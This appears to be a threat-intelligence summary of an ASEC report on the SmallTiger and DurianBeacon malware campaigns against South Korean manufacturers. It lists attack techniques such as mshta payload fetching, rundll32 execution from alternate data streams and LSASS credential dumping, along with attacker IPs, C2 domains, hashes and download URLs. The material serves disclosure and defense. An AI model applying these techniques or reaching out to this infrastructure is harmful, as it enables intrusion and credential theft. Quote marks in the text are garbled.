ASEC reports active use of the SmallTiger malware in attacks against South Korean businesses, with targets including defense contractors, auto parts manufacturers, and semiconductor makers. The operation linked to Kimsuky and Andariel, evolving from DurianBeacon to SmallTiger while leveraging updater software, DLL dropper activity, and downloader capabilities with C2 communication over TLS. #SmallTiger #DurianBeacon #Kimsuky #Andariel #WebBrowserPassView
Keypoints
- The campaigns target South Korean defense contractors, automobile parts, and semiconductor manufacturers, with lateral movement via software updater exploitation.
- DurianBeacon was used in the November 2023 wave and later superseded by SmallTiger in February 2024; the Go-based DurianBeacon communicates over SSL/TLS to its C2 server.
- Initial access details are unclear, but the attacker propagated malware during internal movement, using techniques associated with the Andariel group in some stages.
- SmallTiger Case #1 involved DLL-based downloaders, memory-resident payloads, credential dumping (Mimikatz/ProcDump), and browser credential stealer components (NirSoft WebBrowserPassView).
- SmallTiger Case #2 employed mshta to fetch JavaScript from C2, created payloads in ADS (Alternate Data Stream) areas, and used rundll32 to execute them; GitHub hosted payloads in May 2024.
- Overall indicators include multiple MD5s, domain/IPs, and download URLs tied to DurianBeacon and SmallTiger, plus C2 infrastructure across various KR domains and IPs.
- Recommendations stress phishing avoidance, patching OS/browsers, and monitoring security tools to prevent future infections.
MITRE Techniques
- [T1059.001] PowerShell â âExecute PowerShell commandsâ used during operation.
Quoted: âExecute PowerShell commandsâ - [T1218.005] Mshta â âThe downloaded JavaScript creates a payload that is included internally at the ⌠pathâand runs it using rundll32â.
Quoted: âdownload a malicious JavaScript from the C&C server using the mshta command and runs it.â - [T1218.011] Rundll32 â âruns it using rundll32â to execute payloads from ADS areas.
Quoted: ââŚand runs it using rundll32.â - [T1055] Process Injection â âDurianBeacon loads a DLL created in theâŚdll path and calls the RyXmqIUMXViyw6Uvkf() functionâ.
Quoted: âloads a DLL created in the â%SystemDirectory%OGPWm4uRZ0CAkHZ9oc0FcEpj86LSNmZ5.dllâ path and calls the RyXmqIUMXViyw6Uvkf() function.â - [T1027] Obfuscated/Compressed Files and Information â âdecrypts three files that exist in the resource and installs them ⌠decrypts the files to execute them inside the memory.â
Quoted: âdecrypts three files that exist in the resource and decrypts the files to execute them inside the memory.â - [T1082] System Information Discovery â âThe DurianBeacon ⌠sends the infected systemâs IP information, user name, desktop name, architecture, and file namesâ.
Quoted: âsends the infected systemâs IP information, user name, desktop name, architecture, and file names before awaiting commands.â - [T1083] File and Directory Discovery â âLook up directoryâ.
Quoted: âLook up directoryâ - [T1105] Ingress Tool Transfer â âdownload a payloadâ and âdownloads a payload to execute in memoryâ.
Quoted: âdownload a payload and executes it inside the memory.â - [T1041] Exfiltration Over C2 Channel â âUpload filesâ during operation.
Quoted: âUpload filesâ - [T1090] Proxy â âSocks Proxyâ capability used for relaying traffic.
Quoted: âSocks Proxyâ - [T1573.001] TLS â âuses the SSL protocol to communicate with the C&C serverâ.
Quoted: âuses the SSL protocol to communicate with the C&C server.â - [T1003.001] Credential Dumping â âMimikatz and ProcDump ⌠dumped memory of the LSASS processâ.
Quoted: âdumped the memory of the LSASS process using the ProcDump tool to hijack the infected systemâs credentials.â - [T1555.003] Credentials in Web Browsers â âNirSoftâs WebBrowserPassView and browser credential theftâ.
Quoted: âthe memory of NirSoftâs WebBrowserPassView and web browser was also discoveredâŚâ - [T1021.001] Remote Desktop Protocol â âMultiRDP patches the memory of the currently running remote desktop service ⌠with RDPâ.
Quoted: âpatches the memory of the currently running remote desktop service so that multiple users can connect with remote desktop protocol (RDP).â
Indicators of Compromise
- [IP] context â 104.168.145.83:993, 38.110.1.69:993, and other IPs listed with Meterpreter/Kimsuky activity
- [Domain] context â www.yah00.o-r.kr:53, www.aslark.kro.kr:1433, www.aslark1.kro.kr:1433, www.lazor.kro.kr:443, and other KR domains
- [Domain] SmallTiger C2 â www.navver.o-r.kr:53, w3.navver.o-r.kr:53, www.kepir.p-e.kr:53, www.kepir.p-e.kr:1521
- [MD5] â 48d53985cefb9029feb349bcd514c444, d6a38ffdbac241d69674fb142a420740, 232046aff635f1a5d81e415ef64649b7
- [MD5] â e582bd909800e87952eb1f206a279e47, 2a60348bd0fb2b5fadeb2a691c921370, 5e7acd7bf25dd7ef69bd76cbf7e96819
- [File] â j******n.exe (SmallTiger downloader/dropper), printsys.dll, mNyKQBP3vV4uX (ADS payload)
- [File] â DurianBeacon dropper (m.dat), DurianBeacon loader (mozillasvcone.dll), DurianBeacon loader (c0FcEpj86LSNmZ5.dll)
- [URLs] â hxxp://my.shoping.kro[.]kr/setting.dat, hxxp://my.shoping.kro[.]kr/m.dat, hxxp://my.shoping.kro[.]kr/ng.db
- [ADS/Path] â C:/Users/Public/printsys.dll:mdata (payload location in ADS)
Read more: https://asec.ahnlab.com/en/66546/